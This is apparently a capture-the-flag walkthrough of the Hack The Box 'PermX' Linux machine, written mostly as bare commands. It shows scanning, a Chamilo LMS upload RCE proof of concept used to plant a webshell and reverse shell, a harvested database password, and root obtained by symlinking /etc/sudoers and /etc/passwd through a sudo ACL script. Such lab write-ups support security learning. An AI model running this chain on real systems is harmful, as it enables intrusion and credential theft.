Cu3rv0x
PermX

PermX


HTB Linux

nmap -A -p- -oA permx 10.10.11.23 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA permx 10.10.11.23

nmap -sU -O -p- -oA permx-udp 10.10.11.23

ping -c 1 10.10.11.23

![ssh_command.](/20240715090020.png]]

nmap -p- --open -T5 -v -n 10.10.11.145

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.145 -oG allPorts

![ssh_command.](/20240715085924.png]]

extractPorts allPorts

nmap -sCV -p443 10.10.11.145 -oN targeted

![ssh_command.](/20240715090148.png]]

bc targeted -l rb

![ssh_command.](/20240715090210.png]]

echo "10.10.11.23 permx.htb lms.permx.htb" | sudo tee -a /etc/hosts

whatweb http://10.10.11.23

![ssh_command.](/20240715090423.png]]

wfuzz -c --hc=302,404,403,400 -t 200 -w /usr/share/Seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://10.10.11.23/ -H "Host: FUZZ.permx.htb"

![ssh_command.](/20240715104158.png]]

git clone https://github.com/m3m0o/chamilo-lms-unathenticated-big-upload-rce-poc.git

![ssh_command.](/20240715125742.png]]

python3 main.py -u http://lms.permx.htb -a scan

![ssh_command.](/20240715125832.png]]

python3 main.py -u http://lms.permx.htb -a webshell

![ssh_command.](/20240715125951.png]]

python3 main.py -u http://lms.permx.htb -a revshell

![ssh_command.](/20240715134207.png]]

nc -lvnp 9001

![ssh_command.](/20240715130901.png]]

whoami

ls -ahl

![ssh_command.](/20240715135037.png]]

cat /var/www/chamilo/app/config/configuration.php | grep -i password -C 3

![ssh_command.](/20240715134633.png]]

Credenciales-> chamilo:03F6lY3uXAP2bkW8

ssh mtz@permx.htb

![ssh_command.](/20240715135251.png]]

cat user.txt

![ssh_command.](/20240715135453.png]]

cat /opt/acl.sh

![ssh_command.](/20240715135714.png]]

ln -s /etc/sudoers /home/mtz/sudoers

sudo /opt/acl.sh mtz rw /home/mtz/sudoers

sudo -l

![ssh_command.](/20240715140239.png]]

openssl passwd -1 'password'

![ssh_command.](/20240715183424.png]]

ln -s /etc/passwd /home/mtz/file

sudo /opt/acl.sh mtz rw /home/mtz/file

Copiamos el resultado del comando de openssl y lo reemplazamos con la primera fila

vim /home/mtz/file

su

cat root/root.txt

![ssh_command.](/20240715183409.png]]

© 2024 Cu3rv0x